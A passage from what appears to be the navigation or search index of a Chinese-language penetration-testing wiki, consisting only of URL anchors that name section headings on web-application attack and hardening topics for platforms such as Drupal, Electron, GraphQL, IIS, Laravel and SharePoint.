es-pentesting/pentesting-web/dotnetnuke-dnn.html#通过aspx-webshell上传","network-services-pentesting/pentesting-web/dotnetnuke-dnn.html#windows上的权限提升","network-services-pentesting/pentesting-web/dotnetnuke-dnn.html#加固建议蓝队","network-services-pentesting/pentesting-web/dotnetnuke-dnn.html#参考文献","network-services-pentesting/pentesting-web/drupal/index.html#drupal","network-services-pentesting/pentesting-web/drupal/index.html#发现","network-services-pentesting/pentesting-web/drupal/index.html#枚举","network-services-pentesting/pentesting-web/drupal/index.html#版本","network-services-pentesting/pentesting-web/drupal/index.html#用户名枚举","network-services-pentesting/pentesting-web/drupal/index.html#隐藏页面","network-services-pentesting/pentesting-web/drupal/index.html#已安装模块信息","network-services-pentesting/pentesting-web/drupal/index.html#自动化工具","network-services-pentesting/pentesting-web/drupal/index.html#rce","network-services-pentesting/pentesting-web/drupal/index.html#从xss到rce","network-services-pentesting/pentesting-web/drupal/index.html#利用后","network-services-pentesting/pentesting-web/drupal/index.html#读取settingsphp","network-services-pentesting/pentesting-web/drupal/index.html#从数据库中导出用户","network-services-pentesting/pentesting-web/drupal/drupal-rce.html#drupal-rce","network-services-pentesting/pentesting-web/drupal/drupal-rce.html#使用-php-过滤器模块","network-services-pentesting/pentesting-web/drupal/drupal-rce.html#安装-php-filter-模块","network-services-pentesting/pentesting-web/drupal/drupal-rce.html#后门模块","network-services-pentesting/pentesting-web/drupal/drupal-rce.html#使用配置同步对drupal进行后门植入","network-services-pentesting/pentesting-web/drupal/drupal-rce.html#第1部分激活--media--和--media-library-","network-services-pentesting/pentesting-web/drupal/drupal-rce.html#第2部分利用功能--configuration-synchronization-","network-services-pentesting/pentesting-web/drupal/drupal-rce.html#第3部分利用功能--添加文档-","network-services-pentesting/pentesting-web/drupal/drupal-rce.html#第-4-部分-与-webshell-交互","network-services-pentesting/pentesting-web/electron-desktop-apps/index.html#electron-桌面应用","network-services-pentesting/pentesting-web/electron-desktop-apps/index.html#介绍","network-services-pentesting/pentesting-web/electron-desktop-apps/index.html#捕获流量","network-services-pentesting/pentesting-web/electron-desktop-apps/index.html#electron-local-code-injection","network-services-pentesting/pentesting-web/electron-desktop-apps/index.html#rce-xss--nodeintegration","network-services-pentesting/pentesting-web/electron-desktop-apps/index.html#rce-preload","network-services-pentesting/pentesting-web/electron-desktop-apps/index.html#rce-xss--contextisolation","network-services-pentesting/pentesting-web/electron-desktop-apps/index.html#绕过点击事件","network-services-pentesting/pentesting-web/electron-desktop-apps/index.html#通过-shellopenexternal-的-rce","network-services-pentesting/pentesting-web/electron-desktop-apps/index.html#rce-webviewtag--vulnerable-preload-ipc--shellopenexternal","network-services-pentesting/pentesting-web/electron-desktop-apps/index.html#阅读内部文件xss--contextisolation","network-services-pentesting/pentesting-web/electron-desktop-apps/index.html#rce-xss--旧-chromium","network-services-pentesting/pentesting-web/electron-desktop-apps/index.html#xss-phishing-via-internal-url-regex-bypass","network-services-pentesting/pentesting-web/electron-desktop-apps/index.html#file-协议","network-services-pentesting/pentesting-web/electron-desktop-apps/index.html#remote-模块","network-services-pentesting/pentesting-web/electron-desktop-apps/index.html#systempreferences-module","network-services-pentesting/pentesting-web/electron-desktop-apps/index.html#subscribenotification--subscribeworkspacenotification","network-services-pentesting/pentesting-web/electron-desktop-apps/index.html#getuserdefault--setuserdefault","network-services-pentesting/pentesting-web/electron-desktop-apps/index.html#shellshowiteminfolder","network-services-pentesting/pentesting-web/electron-desktop-apps/index.html#content-security-policy","network-services-pentesting/pentesting-web/electron-desktop-apps/index.html#rce-webview-csp--postmessage-trust--local-file-loading-vs-code-163","network-services-pentesting/pentesting-web/electron-desktop-apps/index.html#工具","network-services-pentesting/pentesting-web/electron-desktop-apps/index.html#实验","network-services-pentesting/pentesting-web/electron-desktop-apps/index.html#本地后门植入通过-v8-heap-snapshot-tamperingelectronchromium--cve-2025-55305","network-services-pentesting/pentesting-web/electron-desktop-apps/index.html#references","network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-preload-code.html#electron-contextisolation-rce-via-preload-code","network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-preload-code.html#示例-1","network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-preload-code.html#示例-2discord-应用-rce","network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.html#electron-contextisolation-rce-via-electron-internal-code","network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.html#示例-1","network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.html#示例-2","network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-ipc.html#electron-contextisolation-rce-via-ipc","network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-ipc.html#示例-0","network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-ipc.html#示例-1","network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-ipc.html#示例-2","network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-ipc.html#示例-3","network-services-pentesting/pentesting-web/flask.html#flask","network-services-pentesting/pentesting-web/flask.html#cookies","network-services-pentesting/pentesting-web/flask.html#decoder","network-services-pentesting/pentesting-web/flask.html#flask-unsign","network-services-pentesting/pentesting-web/flask.html#ripsession","network-services-pentesting/pentesting-web/flask.html#sqli-在-flask-会话-cookie-中使用-sqlmap","network-services-pentesting/pentesting-web/flask.html#flask-代理到-ssrf","network-services-pentesting/pentesting-web/git.html#git","network-services-pentesting/pentesting-web/golang.html#connect-方法","network-services-pentesting/pentesting-web/grafana.html#grafana","network-services-pentesting/pentesting-web/grafana.html#interesting-stuff","network-services-pentesting/pentesting-web/graphql.html#graphql","network-services-pentesting/pentesting-web/graphql.html#介绍","network-services-pentesting/pentesting-web/graphql.html#graphql-和安全性","network-services-pentesting/pentesting-web/graphql.html#目录暴力攻击与-graphql","network-services-pentesting/pentesting-web/graphql.html#指纹识别","network-services-pentesting/pentesting-web/graphql.html#基本枚举","network-services-pentesting/pentesting-web/graphql.html#查询","network-services-pentesting/pentesting-web/graphql.html#搜索","network-services-pentesting/pentesting-web/graphql.html#mutations","network-services-pentesting/pentesting-web/graphql.html#directive-overloading","network-services-pentesting/pentesting-web/graphql.html#batching-brute-force-in-1-api-request","network-services-pentesting/pentesting-web/graphql.html#graphql-without-introspection","network-services-pentesting/pentesting-web/graphql.html#bypassing-graphql-introspection-defences","network-services-pentesting/pentesting-web/graphql.html#尝试-websockets","network-services-pentesting/pentesting-web/graphql.html#发现暴露的-graphql-结构","network-services-pentesting/pentesting-web/graphql.html#graphql中的csrf","network-services-pentesting/pentesting-web/graphql.html#graphql-中的跨站-websocket-劫持","network-services-pentesting/pentesting-web/graphql.html#graphql-中的授权","network-services-pentesting/pentesting-web/graphql.html#绕过-graphql-中的授权","network-services-pentesting/pentesting-web/graphql.html#使用-graphql-中的别名绕过速率限制","network-services-pentesting/pentesting-web/graphql.html#dos-in-graphql","network-services-pentesting/pentesting-web/graphql.html#alias-overloading","network-services-pentesting/pentesting-web/graphql.html#基于数组的查询批处理","network-services-pentesting/pentesting-web/graphql.html#指令过载漏洞","network-services-pentesting/pentesting-web/graphql.html#字段重复漏洞","network-services-pentesting/pentesting-web/graphql.html#最近的漏洞-2023-2025","network-services-pentesting/pentesting-web/graphql.html#cve-2024-47614--async-graphql-指令过载-dos-rust","network-services-pentesting/pentesting-web/graphql.html#cve-2024-40094--graphql-java-enf-深度复杂性绕过","network-services-pentesting/pentesting-web/graphql.html#cve-2023-23684--wpgraphql-ssrf-to-rce-chain","network-services-pentesting/pentesting-web/graphql.html#增量交付滥用-defer--stream","network-services-pentesting/pentesting-web/graphql.html#防御性中间件-2024","network-services-pentesting/pentesting-web/graphql.html#工具","network-services-pentesting/pentesting-web/graphql.html#漏洞扫描器","network-services-pentesting/pentesting-web/graphql.html#利用常见漏洞的脚本","network-services-pentesting/pentesting-web/graphql.html#客户端","network-services-pentesting/pentesting-web/graphql.html#自动测试","network-services-pentesting/pentesting-web/graphql.html#参考","network-services-pentesting/pentesting-web/h2-java-sql-database.html#h2---java-sql数据库","network-services-pentesting/pentesting-web/h2-java-sql-database.html#访问","network-services-pentesting/pentesting-web/h2-java-sql-database.html#rce","network-services-pentesting/pentesting-web/h2-java-sql-database.html#h2-sql注入到rce","network-services-pentesting/pentesting-web/iis-internet-information-services.html#iis---internet-information-services","network-services-pentesting/pentesting-web/iis-internet-information-services.html#内部ip地址泄露","network-services-pentesting/pentesting-web/iis-internet-information-services.html#执行-config-文件","network-services-pentesting/pentesting-web/iis-internet-information-services.html#iis-发现暴力破解","network-services-pentesting/pentesting-web/iis-internet-information-services.html#路径遍历","network-services-pentesting/pentesting-web/iis-internet-information-services.html#泄露源代码","network-services-pentesting/pentesting-web/iis-internet-information-services.html#探索二进制文件","network-services-pentesting/pentesting-web/iis-internet-information-services.html#根目录文件","network-services-pentesting/pentesting-web/iis-internet-information-services.html#命名空间和-webconfig","network-services-pentesting/pentesting-web/iis-internet-information-services.html#下载-dlls","network-services-pentesting/pentesting-web/iis-internet-information-services.html#常见文件","network-services-pentesting/pentesting-web/iis-internet-information-services.html#httpapi-20-404-错误","network-services-pentesting/pentesting-web/iis-internet-information-services.html#值得关注的旧-iis-漏洞","network-services-pentesting/pentesting-web/iis-internet-information-services.html#microsoft-iis-波浪字符漏洞特性--短文件文件夹名称泄露","network-services-pentesting/pentesting-web/iis-internet-information-services.html#基本身份验证绕过","network-services-pentesting/pentesting-web/iis-internet-information-services.html#aspnet-traceaxd-启用调试","network-services-pentesting/pentesting-web/iis-internet-information-services.html#aspxauth-cookie","network-services-pentesting/pentesting-web/iis-internet-information-services.html#iis-身份验证绕过与缓存密码-cve-2022-30209","network-services-pentesting/pentesting-web/imagemagick-security.html#imagemagick-安全","network-services-pentesting/pentesting-web/imagemagick-security.html#朝着更安全的政策","network-services-pentesting/pentesting-web/imagemagick-security.html#允许列表与拒绝列表方法","network-services-pentesting/pentesting-web/imagemagick-security.html#策略中的大小写敏感性","network-services-pentesting/pentesting-web/imagemagick-security.html#资源限制","network-services-pentesting/pentesting-web/imagemagick-security.html#策略碎片化","network-services-pentesting/pentesting-web/imagemagick-security.html#a-starter-restrictive-policy","network-services-pentesting/pentesting-web/imagemagick-security.html#references","network-services-pentesting/pentesting-web/ispconfig.html#ispconfig","network-services-pentesting/pentesting-web/ispconfig.html#概述","network-services-pentesting/pentesting-web/ispconfig.html#语言编辑器-php-代码注入-cve-2023-46818","network-services-pentesting/pentesting-web/ispconfig.html#手动利用流程","network-services-pentesting/pentesting-web/ispconfig.html#python-poc","network-services-pentesting/pentesting-web/ispconfig.html#硬化","network-services-pentesting/pentesting-web/ispconfig.html#参考资料","network-services-pentesting/pentesting-web/jboss.html#jboss","network-services-pentesting/pentesting-web/jboss.html#枚举和利用技术","network-services-pentesting/pentesting-web/jboss.html#利用资源","network-services-pentesting/pentesting-web/jboss.html#寻找易受攻击的目标","network-services-pentesting/pentesting-web/jira.html#jira--confluence","network-services-pentesting/pentesting-web/jira.html#检查权限","network-services-pentesting/pentesting-web/jira.html#自动化枚举","network-services-pentesting/pentesting-web/jira.html#atlasian-插件","network-services-pentesting/pentesting-web/jira.html#后门插件","network-services-pentesting/pentesting-web/joomla.html#joomla","network-services-pentesting/pentesting-web/joomla.html#joomla-统计","network-services-pentesting/pentesting-web/joomla.html#enumeration","network-services-pentesting/pentesting-web/joomla.html#discoveryfootprinting","network-services-pentesting/pentesting-web/joomla.html#版本","network-services-pentesting/pentesting-web/joomla.html#自动","network-services-pentesting/pentesting-web/joomla.html#api-未经身份验证的信息泄露","network-services-pentesting/pentesting-web/joomla.html#暴力破解","network-services-pentesting/pentesting-web/joomla.html#rce","network-services-pentesting/pentesting-web/joomla.html#从-xss-到-rce","network-services-pentesting/pentesting-web/jsp.html#jsp","network-services-pentesting/pentesting-web/jsp.html#getcontextpath--滥用","network-services-pentesting/pentesting-web/laravel.html#laravel","network-services-pentesting/pentesting-web/laravel.html#laravel-sqlinjection","network-services-pentesting/pentesting-web/laravel.html#app_key--encryption-internals-laravel-u003e56","network-services-pentesting/pentesting-web/laravel.html#laravel-crypto-killer-","network-services-pentesting/pentesting-web/laravel.html#真实世界的易受攻击模式","network-services-pentesting/pentesting-web/laravel.html#通过-cookie-brute-force-发现大量-app_key","network-services-pentesting/pentesting-web/laravel.html#cve-2024-52301--http-argvenv-覆盖--auth-bypass","network-services-pentesting/pentesting-web/laravel.html#laravel-技巧","network-services-pentesting/pentesting-web/laravel.html#调试模式","network-services-pentesting/pentesting-web/laravel.html#指纹识别--暴露的开发端点","network-services-pentesting/pentesting-web/laravel.html#env","network-services-pentesting/pentesting-web/laravel.html#decrypt-cookie","network-services-pentesting/pentesting-web/laravel.html#laravel-deserialization-rce","network-services-pentesting/pentesting-web/laravel.html#cve-2021-3129","network-services-pentesting/pentesting-web/laravel.html#references","network-services-pentesting/pentesting-web/microsoft-sharepoint.html#microsoft-sharepoint--pentesting--exploitation","network-services-pentesting/pentesting-web/microsoft-sharepoint.html#1-quick-enumeration","network-services-pentesting/pentesting-web/microsoft-sharepoint.html#2-2025-exploit-chain-aka-toolshell","network-services-pentesting/pentesting-web/microsoft-sharepoint.html#21-cve-2025-49704--code-injection-on-toolpaneaspx","network-services-pentesting/pentesting-web/microsoft-sharepoint.html#22-cve-2025-49706--improper-authentication-bypass","network-services-pentesting/pentesting-web/microsoft-sharepoint.html#23-cve-2025-53770--unauthenticated-viewstate-deserialization--rce","network-services-pentesting/pentesting-web/microsoft-sharepoint.html#24-cve-2025-53771--路径遍历--webconfig-泄露","network-services-pentesting/pentesting-web/microsoft-sharepoint.html#3-在野外观察到的后渗透食谱","network-services-pentesting/pentesting-web/microsoft-sharepoint.html#31-提取每个--config--文件变体-1","network-services-pentesting/pentesting-web/microsoft-sharepoint.html#32-部署一个-base64-编码的-aspx-web-shell变体-2","network-services-pentesting/pentesting-web/microsoft-sharepoint.html#33-混淆变体变体-3","network-services-pentesting/pentesting-web/microsoft-sharepoint.html#34-ak47c2-多协议后门和-x2anylock-勒索软件观察到-2025-2026","network-services-pentesting/pentesting-web/microsoft-sharepoint.html#4-检测思路","network-services-pentesting/pentesting-web/microsoft-sharepoint.html#5-加固与缓解","network-services-pentesting/pentesting-web/microsoft-sharepoint.html#相关技巧","network-services-pentesting/pentesting-web/microsoft-sharepoint.html#参考文献","network-services-pentesting/pentesting-web/moodle.html#moodle","network-services-pentesting/pentesting-web/moodle.html#自动扫描","network-services-pentesting/pentesting-web/moodle.html#droopescan","network-services-pentesting/pentesting-web/moodle.html#moodlescan","network-services-pentesting/pentesting-web/moodle.html#cmsmap","network-services-pentesting/pentesting-web/moodle.html#cves","network-services-pentesting/pentesting-web/moodle.html#rce","network-services-pentesting/pentesting-web/moodle.html#post","network-services-pentesting/pentesting-web/moodle.html#查找数据库凭据","network-services-pentesting/pentesting-web/moodle.html#从数据库中转储凭据","network-services-pentesting/pentesting-web/nextjs.html#nextjs","network-services-pentesting/pentesting-web/nextjs.html#nextjs-应用程序的一般架构","network-services-pentesting/pentesting-web/nextjs.html#典型文件结构","network-services-pentesting/pentesting-web/nextjs.html#核心目录和文件","network-services-pentesting/pentesting-web/nextjs.html#nextjs-中的客户端","network-services-pentesting/pentesting-web/nextjs.html#app-目录中的基于文件的路由","network-services-pentesting/pentesting-web/nextjs.html#潜在的客户端漏洞","network-services-pentesting/pentesting-web/nextjs.html#nextjs-中的服务器端","network-services-pentesting/pentesting-web/nextjs.html#服务器端渲染-ssr","network-services-pentesting/pentesting-web/nextjs.html#静态网站生成-ssg","network-services-pentesting/pentesting-web/nextjs.html#serverless-functions-api-routes","network-services-pentesting/pentesting-web/nextjs.html#pages-目录中的-api-路由nextjs-12-及更早版本","network-services-pentesting/pentesting-web/nextjs.html#cors配置","network-services-pentesting/pentesting-web/nextjs.html#客户端的服务器代码暴露","network-services-pentesting/pentesting-web/nextjs.html#关键文件及其角色","network-services-pentesting/pentesting-web/nextjs.html#middlewarets--middlewarejs","network-services-pentesting/pentesting-web/nextjs.html#nextconfigjs","network-services-pentesting/pentesting-web/nextjs.html#pages_appjs-和-pages_documentjs","network-services-pentesting/pentesting-web/nextjs.html#自定义服务器可选","network-services-pentesting/pentesting-web/nextjs.html#额外的架构和安全考虑","network-services-pentesting/pentesting-web/nextjs.html#环境变量和配置","network-services-pentesting/pentesting-web/nextjs.html#身份验证和授权","network-services-pentesting/pentesting-web/nextjs.html#性能优化","network-services-pentesting/pentesting-web/nginx.html#nginx","network-services-pentesting/pentesting-web/nginx.html#missing-root-location","network-services-pentesting/pentesting-web/nginx.html#alias-lfi-misconfiguration","network-services-pentesting/pentesting-web/nginx.html#不安全的路径限制","network-services-pentesting/pentesting-web/nginx.html#不安全的变量使用--http-请求分割","network-services-pentesting/pentesting-web/nginx.html#any-variable","network-services-pentesting/pentesting-web/nginx.html#使用-try_files-和-uriargs-变量","network-services-pentesting/pentesting-web/nginx.html#原始后端响应读取","network-services-pentesting/pentesting-web/nginx.html#merge_slashes-设置为-off","network-services-pentesting/pentesting-web/nginx.html#maclicious-响应头","network-services-pentesting/pentesting-web/nginx.html#map-指令中的默认值","network-services-pentesting/pentesting-web/nginx.html#dns-欺骗漏洞","network-services-pentesting/pentesting-web/nginx.html#proxy_pass-和-internal-指令","network-services-pentesting/pentesting-web/nginx.html#proxy_set_header-upgrade--connection","network-services-pentesting/pentesting-web/nginx.html#尝试一下","network-services-pentesting/pentesting-web/nginx.html#静态分析工具","network-services-pentesting/pentesting-web/nginx.html#gixy","network-services-pentesting/pentesting-web/nginx.html#nginxpwner","network-services-pentesting/pentesting-web/nginx.html#参考文献","network-services-pentesting/pentesting-web/nodejs-express.html#nodejs-express","network-services-pentesting/pentesting-web/nodejs-express.html#cookie-signature","network-services-pentesting/pentesting-web/nodejs-express.html#single-cookie-with-a-specific-name","network-services-pentesting/pentesting-web/nodejs-express.html#自定义字典","network-services-pentesting/pentesting-web/nodejs-express.html#使用批处理模式测试多个-cookie","network-services-pentesting/pentesting-web/nodejs-express.html#使用自定义字典在批处理模式下测试多个-cookie","network-services-pentesting/pentesting-web/nodejs-express.html#编码并签署新-cookie","network-services-pentesting/pentesting-web/sitecore/index.html#sitecore-experience-platform-xp--preauth-html-cache-poisoning-to-postauth-rce","network-services-pentesting/pentesting-web/sitecore/index.html#preauth-primitive-xaml-ajax-reflection--htmlcache-write","network-services-pentesting/pentesting-web/sitecore/index.html#poc-请求-cve-2025-53693","network-services-pentesting/pentesting-web/sitecore/index.html#what-to-poison-缓存键构造","network-services-pentesting/pentesting-web/sitecore/index.html#枚举可缓存项和-vary-by-维度","network-services-pentesting/pentesting-web/sitecore/index.html#sidechannel-enumeration-under-restricted-identities-cve-2025-53694","network-services-pentesting/pentesting-web/sitecore/index.html#postauth-rce-binaryformatter-sink-位于-converttoruntimehtml-cve-2025-53691","network-services-pentesting/pentesting-web/sitecore/index.html#完整利用链","network-services-pentesting/pentesting-web/sitecore/index.html#检测","network-services-pentesting/pentesting-web/sitecore/index.html#加固","network-services-pentesting/pentesting-web/sitecore/index.html#references","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#php-tricks","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#cookies-common-location","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#绕过-php-比较","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#松散比较类型转换---","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#in_array","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#strcmpstrcasecmp","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#严格类型转换","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#preg_match","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#php混淆的类型转换","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#execute-after-redirect-ear","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#路径遍历和文件包含漏洞利用","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#更多技巧","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#password_hashpassword_verify","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#http-headers-bypass-abusing-php-errors","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#php-函数中的-ssrf","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#代码执行","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#通过---preg_replace---进行-rce","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#通过eval进行rce","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#通过-assert-实现-rce","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#通过-usort-进行-rce","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#通过-httaccess-实现-rce","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#通过环境变量实现-rce","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#xampp-cgi-rce---cve-2024-4577","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#php-sanitization-bypass--brain-fuck","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#php-静态分析","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#反混淆-php-代码","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#php-包装器和协议","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#xdebug-未经身份验证的-rce","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#变量变量","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#rce-利用新的-_geta_getb","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#无字母执行-php","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#使用八进制","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#异或","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#xor-简易-shell-代码","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#xor-shellcode-inside-eval","network-services-pentesting/pentesting-web/php-tricks-esp/index.html#类似-perl","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/index.html#php---有用的函数与-disable_functionsopen_basedir-绕过","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/index.html#php-命令与代码执行","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/index.html#php-命令执行","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/index.html#php-代码执行","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/index.html#disable_functions--open_basedir","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/index.html#open_basedir-bypass","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/index.html#使用-glob-绕过列出目录","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/index.html#完全绕过-open_basedir-利用-fastcgi","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/index.html#disable_functions-绕过","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/index.html#自动绕过发现","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/index.html#使用其他系统函数绕过","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/index.html#ld_preload-绕过","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/index.html#使用-php-功能的绕过","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/index.html#模块版本依赖的绕过","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/index.html#自动工具","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/index.html#其他有趣的-php-函数","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/index.html#接受回调的函数列表","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/index.html#信息泄露","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/index.html#其他","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/index.html#文件系统函数","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.html#disable_functions-bypass---php-fpmfastcgi","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.html#php-fpm","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.html#但-cgi-和-fastcgi-是什么","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.html#cgi","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.html#fastcgi","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.html#disable_functions-bypass","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.html#通过-gopherus","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.html#php-漏洞","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.html#fuckfastgci","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.html#php-fpm-远程代码执行漏洞-cve-201911043","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-dl-function.html#攻击者采取的步骤","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-dl-function.html#编译自定义扩展的注意事项","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-dl-function.html#自定义扩展文件","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-dl-function.html#构建扩展","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-dl-function.html#在受害者主机上上传和执行","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-dl-function.html#命令执行","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-7.0-7.4-nix-only.html#disable_functions-bypass---php-70-74-nix-only","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-7.0-7.4-nix-only.html#php-70-74-nix-only","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.html#imagick--54---disable_functions--bypass","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.html#为什么它有效","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.html#2025-状态--仍然--相关","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.html#现代有效载荷变体","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.html#快速检测与枚举","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.html#缓解措施","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-imagick-less-than-3.3.0-php-greater-than-5.4-exploit.html#参考文献","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.x-shellshock-exploit.html#php-5x-shellshock-漏洞利用","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-php-5.2.4-ioncube-extension-exploit.html#php-524-ioncube-扩展漏洞","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-less-than-5.2.9-on-windows.html#php--529-在-windows-上","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-5.2.4-and-5.2.5-php-curl.html#php-524-和-525-php-curl","network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-f